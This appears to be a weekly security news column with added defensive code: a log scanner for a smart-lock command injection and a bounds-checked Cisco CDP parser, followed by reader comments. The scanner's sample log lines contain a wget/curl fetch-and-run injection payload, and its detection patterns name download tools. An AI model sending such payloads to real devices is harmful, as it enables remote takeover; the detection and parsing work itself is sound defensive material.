This Week In Security: Google Photos, Whatsapp, And Doom On Deskphones

Google Photos is handy. You take pictures and videos on your cell phone, and they automatically upload to the cloud. If you’re anything like me, however, every snap comes with a self-reminder that “the cloud” is a fancy name for someone else’s server. What could possibly go wrong? How about some of your videos randomly included in another user’s downloads?

Confirmed by Google themselves, this bug hit those using Google Takeout, the service that allows you to download all your data from a Google application as a single archive. Google Photos archives downloaded between November 21 and November 25 may contain videos from other users, according to a notice sent to the users who downloaded said archives. It’s notable that those notices haven’t been sent to the users whose videos were exposed.

Whatsapp

Whatsapp has been in the news for a couple reasons in the last few days. I’ll leave it to you to decide if the stories are related. First, Jeff Bezos seems to have had some of his accounts or devices compromised by Saudi agents. The popular theory is that a video sent over Whatsapp contained an exploit, which when downloaded on Bezos’ iPhone, resulted in a persistent compromise. This theory seems to be supported by an analysis by FTI.

Reading through the report is… underwhelming. The video they suspect to have been the compromise vector wasn’t ever successfully decrypted. No actual Indicators of Compromise were found, and no maliciously changed systems files were identified. The closest thing to a smoking gun found in the report is the vast amounts of outgoing data observed after the potential compromise. There are questions about the usefulness of that metric, and Robert Graham does a good job debunking the report.

Whatsapp *has* had several high profile vulnerabilities that could have been used to pull off an attack like this. Which brings us to the topic of vulnerabilities in Whatsapp, so here’s one in the desktop app.

[Gal Weizman] discovered a weird Whatsapp problem in 2017. When using the web interface and sending a message that quoted a previous message, it was possible to manipulate the message being quoted, putting words in someone’s mouth. He found it amusing, but eventually came back to take a more serious look at what he’d found. He discovered that he could also hijack the link preview banner, giving him a cross site scripting attack. That would be a serious enough vulnerability in itself, but not content with XSS, [Gal] took things one step further.

Whatsapp offers a native desktop app, using the Electron framework. Electron essentially lets you package a web app in native form. Under the hood, it’s simply a browser bundled with the web-based code. A consequence of Electron is that an XSS vulnerability in the web app will likely work in the Electron app as well. This was no exception, and since Whatsapp was shipping their app with an ancient version of Electron, an old Chrome vulnerability was still present, resulting in a viable RCE that escapes the Electron app.

Whatsapp has released updates that address these issues, so if you have desktop Whatsapp installed, go make sure it’s up to date!

I got Phished

You’re familiar with haveibeenpwned.com. Have you ever thought to yourself, if only there was a service that alerted me when one of my domains showed up in a phishing attack… I Got Phished is the service for you. It’s intended for a company’s security team to sign up with the company domains. When an email address from one of those domains shows up in a phishing database, the team gets an email alerting them.

All it takes to sign up is the abuse@, postmaster@, noc@, or security@ email address for the domain you want to monitor. So gmail users, you’re out of luck. If you run your own domain, then maybe it’s worth signing up for the service.

Cisco Security DOOMed by CDPwn

A series of smart locks made by Nortek Security & Control has a vulnerability that is now being actively exploited. A PHP endpoint on those devices fails to sanitize its inputs properly, runs as root, and can be used to run arbitrary commands. “card_scan+decoder.php” is accessible over HTTP, and anything in the “door” parameter is executed as root. The active attack uses wget to grab a file from a remote server and run that file.

To exploit this flaw remotely, the endpoint has to be accessible, which means that only devices with a public IP address are vulnerable so far. The limited IPv4 address space and widespread usage of NAT have once again blunted the impact of a really serious vulnerability. It will be interesting to watch what happens with the growing popularity of IPv6, as more devices, many of them less secure, get their own IP addresses.
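Since the attack described above leaves a trace in the device’s or the upstream proxy’s web logs, the practical defender question is how to spot it. The following is an added example, not code from the article or from Nortek: it runs a small detector over a few constructed access-log lines (documentation-range IP addresses, made-up requests) and flags requests to the lock endpoint whose “door” parameter carries shell metacharacters or names a download tool. The pattern for the script name tolerates any single character between “card_scan” and “decoder”, since the name is rendered with a “+” above; the log format and the alert fields are this example’s own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined access-log format. Addresses are from
# documentation ranges and the requests are made up to exercise the detector.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2020:10:01:12 +0000] "GET /card_scan_decoder.php?No=1&door=%60wget+http://198.51.100.9/x+-O+/tmp/x%3Bsh+/tmp/x%60 HTTP/1.1" 200 512
198.51.100.22 - - [06/Feb/2020:10:02:40 +0000] "GET /card_scan_decoder.php?No=1&door=3 HTTP/1.1" 200 128
192.0.2.5 - - [06/Feb/2020:10:03:01 +0000] "GET /index.php HTTP/1.1" 200 2048
203.0.113.7 - - [06/Feb/2020:10:04:19 +0000] "GET /card_scan_decoder.php?No=1&door=1%3Bcurl+http://198.51.100.9/x HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The writeup renders the script name as "card_scan+decoder.php"; accept any
# single character between the two words so either rendering is caught.
ENDPOINT_RE = re.compile(r"card_scan.decoder\.php$")
SHELL_META = re.compile(r"[;|&`]|\$\(")                    # separators / substitution
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)


def inspect_door_param(target):
    """Return the reasons a request to the lock endpoint looks like command
    injection: [] if it looks benign, None if the path is something else."""
    parts = urlsplit(target)
    if not ENDPOINT_RE.search(parts.path):
        return None
    door = parse_qs(parts.query).get("door", [""])[0]        # percent-decoded
    reasons = []
    if SHELL_META.search(door):
        reasons.append("shell metacharacter in door")
    if DOWNLOADERS.search(door):
        reasons.append("download tool named in door")
    return reasons


def scan_access_log(text):
    """Return one alert dict per suspicious request found in the log text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_door_param(m["target"])
        if reasons:
            alerts.append({"ip": m["ip"], "time": m["ts"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f'{alert["time"]} {alert["ip"]}: {", ".join(alert["reasons"])}')
```

On the sample above only the two requests from 203.0.113.7 are reported; the plain `door=3` request and the unrelated `/index.php` request pass. On the device side the matching fix is the usual one: treat “door” as an identifier to be validated against an allowlist rather than text to be handed to a shell, and don’t run the web process as root.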

Doom on a Desk Phone

Researchers at Armis have published their research into Cisco hardware under the name CDPwn, inspired by Cisco’s CDP (Cisco Discovery Protocol). The interesting details are available in their whitepaper, but before we get to that, take a moment to watch the video embedded below, as it combines a couple of our favorite things here at Hackaday: security vulnerabilities, and running Doom on unexpected hardware.

Cisco manufactures hundreds of different devices, and one of their selling points is interoperability. You plug a Cisco phone into a Cisco switch, and they do some autoconfiguration magic, setting up proper VLANs, etc. Many of these features depend on proprietary Cisco protocols, and one of the most important is CDP. This layer-2 protocol allows devices to communicate with each other, regardless of what VLAN they’re set to. After looking at previously discovered CDP flaws, the guys at Armis got to work. Their first discovery was a Denial of Service attack. A packet informing a neighboring device about addresses lacked a reasonable upper bound on the number of addresses described. An incoming packet could claim to be describing three billion addresses, and the target device would simply crash trying to allocate enough memory to handle the packet.

One surprising discovery is that the CDP implementation seems to be built from scratch for different Cisco product lines. While this means that a single vulnerability can’t be leveraged across every device, it does suggest that more vulnerabilities will exist overall, and will take longer to fix. In VoIP phones, for example, the PortID TLV (Type-Length-Value) is copied into a static buffer without proper length checks. It’s a trivial buffer overflow, easily leading to exploitation.
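Both flaws above are missing bounds checks in a TLV parser, so the most useful thing to show is what those checks look like. The following is an added example, not Armis’s or Cisco’s code: a small CDP parser in Python that handles the Device ID, Addresses and Port ID TLVs, bounds the declared address count by the bytes actually present before allocating anything, and refuses a Port ID longer than its destination buffer instead of copying it blindly. The 64-byte buffer size is an assumed figure for illustration, not the size of any Cisco buffer, and the frames at the bottom are constructed test vectors, one well-formed and two shaped like the flaws described in the text.

```python
import struct

# Standard CDP TLV type codes for the three TLVs handled here.
TLV_DEVICE_ID = 0x0001
TLV_ADDRESSES = 0x0002
TLV_PORT_ID = 0x0003
TLV_HEADER = 4          # type (2) + length (2); the length field covers the header too
MIN_ADDRESS_ENTRY = 6   # proto type(1) + proto len(1) + proto(>=1) + addr len(2) + addr(>=1)
MAX_PORT_ID = 64        # assumed size of a fixed receive buffer, not Cisco's real value


class CdpError(ValueError):
    """Raised for any frame that fails a bounds check."""


def tlv(tlv_type, value):
    return struct.pack("!HH", tlv_type, TLV_HEADER + len(value)) + value


def cdp_frame(tlvs):
    # Version 2, hold time 180 s, checksum left at zero (not validated in this example).
    return struct.pack("!BBH", 2, 180, 0) + b"".join(tlvs)


def parse_addresses(value):
    if len(value) < 4:
        raise CdpError("addresses TLV shorter than its count field")
    count = struct.unpack("!I", value[:4])[0]
    # Bound the declared count by what the TLV can physically carry *before*
    # allocating anything; this is the check the DoS in the writeup was missing.
    if count > (len(value) - 4) // MIN_ADDRESS_ENTRY:
        raise CdpError(f"declared {count} addresses but only {len(value) - 4} bytes follow")
    addrs, off = [], 4
    for _ in range(count):
        if off + 2 > len(value):
            raise CdpError("truncated address entry")
        ptype, plen = value[off], value[off + 1]
        off += 2
        if off + plen + 2 > len(value):
            raise CdpError("truncated protocol field")
        proto = value[off:off + plen]
        off += plen
        alen = struct.unpack("!H", value[off:off + 2])[0]
        off += 2
        if off + alen > len(value):
            raise CdpError("truncated address")
        addrs.append((ptype, proto, value[off:off + alen]))
        off += alen
    return addrs


def parse_cdp(frame):
    if len(frame) < 4:
        raise CdpError("frame shorter than CDP header")
    version, holdtime, _checksum = struct.unpack("!BBH", frame[:4])
    info = {"version": version, "holdtime": holdtime}
    off = 4
    while off < len(frame):
        if off + TLV_HEADER > len(frame):
            raise CdpError("truncated TLV header")
        tlv_type, length = struct.unpack("!HH", frame[off:off + TLV_HEADER])
        if length < TLV_HEADER or off + length > len(frame):
            raise CdpError(f"TLV length {length} at offset {off} does not fit the frame")
        value = frame[off + TLV_HEADER:off + length]
        if tlv_type == TLV_DEVICE_ID:
            info["device_id"] = value.decode("ascii", "replace")
        elif tlv_type == TLV_PORT_ID:
            # Compare against the destination size instead of copying blindly.
            if len(value) > MAX_PORT_ID:
                raise CdpError(f"port ID of {len(value)} bytes exceeds {MAX_PORT_ID}-byte buffer")
            info["port_id"] = value.decode("ascii", "replace")
        elif tlv_type == TLV_ADDRESSES:
            info["addresses"] = parse_addresses(value)
        off += length
    return info


def check(frame):
    """Summarise the parse outcome as a string (handy for tests and log lines)."""
    try:
        parse_cdp(frame)
        return "ok"
    except CdpError as err:
        return f"rejected: {err}"


# Constructed frames: one well-formed, two shaped like the flaws described in the text.
def benign_frame():
    ipv4 = bytes([1, 1, 0xCC]) + struct.pack("!H", 4) + bytes([192, 0, 2, 1])  # NLPID 0xCC = IP
    return cdp_frame([
        tlv(TLV_DEVICE_ID, b"switch01"),
        tlv(TLV_ADDRESSES, struct.pack("!I", 1) + ipv4),
        tlv(TLV_PORT_ID, b"GigabitEthernet0/1"),
    ])


def address_bomb_frame():
    # Claims three billion addresses while carrying none.
    return cdp_frame([tlv(TLV_ADDRESSES, struct.pack("!I", 3_000_000_000))])


def oversized_port_id_frame():
    return cdp_frame([tlv(TLV_PORT_ID, b"A" * 200)])


if __name__ == "__main__":
    print(parse_cdp(benign_frame()))
    print(check(address_bomb_frame()))
    print(check(oversized_port_id_frame()))
```

The two checks worth copying are the ordering in `parse_addresses` (validate the count against the bytes present, then allocate) and the comparison of the Port ID length against the buffer it is headed for; every other check simply keeps offsets inside the frame.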

Cisco has firmware updates available for the affected devices. These aren’t particularly sophisticated attacks. It appears, once again, that a reputable brand name doesn’t guarantee quality code running under the hood.

12 thoughts on “This Week In Security: Google Photos, Whatsapp, And Doom On Deskphones”

  1. Once again Electron proves that a web browser shouldn’t be used as a replacement for native applications if security is even slightly important.
    Too bad the whole premise of Electron is the illusion that low-paid & low-skilled web developers can now also be programmers.

    1. Have you tried any of the new web frontend technologies? AngularJS, Angular 2, Vue.js, React, Bootstrap, cssgrid? They make UI design not suck. Data binding is awesome and was picked up for Flutter, Android’s new UI library (Android is the worst thing I’ve ever developed for so this is a welcome change). I understand exactly why somebody wants web dev on desktop.

1. And yet you have proven his point exactly. I also understand why someone wants web dev on the desktop, but I also understand why they shouldn’t have it when security is important. All of those “technologies” that you have mentioned add on extra layers into the program and thus have created a larger attack surface for malicious people to take advantage of. It’s simple things like failing to check input length that lead to a buffer overflow which makes secure applications not secure at all.

There is a difference between UI and back end programming and the same tools should not be used for both. While the frameworks you mentioned might be great for creating a dazzling user interface, they are not audited for security. Thus, if security is important in an application, then Electron should not be used as a replacement for native application programming.

2. Under GDPR, don’t Google have to disclose the info to users whose photos have been shared without their consent? I think there’s a timeline for notifications too. 4% of annual turnover as a fine? Somehow I don’t see that happening.

3. And this is why I don’t trust the cloud. Storage is quite cheap nowadays, with the cost of flash drives reasonable enough that you shouldn’t need to depend on a cloud service. Once you upload your data to the cloud, it isn’t your data anymore. It sits on a server somewhere, and you don’t know where that server is, who has access to it, or what security it has. So, would you upload your tax returns to the cloud? Your banking information? Of course not, yet people freely upload pictures of their kids etc. A simple search on someone’s name can not only pull up their current address, email, and phone numbers, but previous addresses, emails, and phone numbers as well. Privacy these days is an illusion. With all the data breaches that have happened over the last few years, and the people who work hard to steal what you have (identity theft etc.), it makes you wonder how many data breaches we haven’t heard of. So, in my opinion, there is no security in the cloud. As I said, once you send your data there, it isn’t yours anymore. When stores ask for my phone number, I tell them to use the store’s number. Oh, but you can save money and get rewards if you sign up. Yes, and the marketing companies can track what I buy. No thank you. I know I sound paranoid, but everyone should be. There are people out there who don’t want to do an honest day’s work, yet they will work as hard as they can to steal anything they can use that will make themselves money. Think about it. Why is this data being collected? Who has access to it? What purpose will it be used for? Data is the digital equivalent of gold, and like gold, people will do anything to get it.

4. Doom would be the best thing about a deskphone… God, I hate those. I have nightmares about all the people that nag me. I disconnected mine. People are so damn needy.
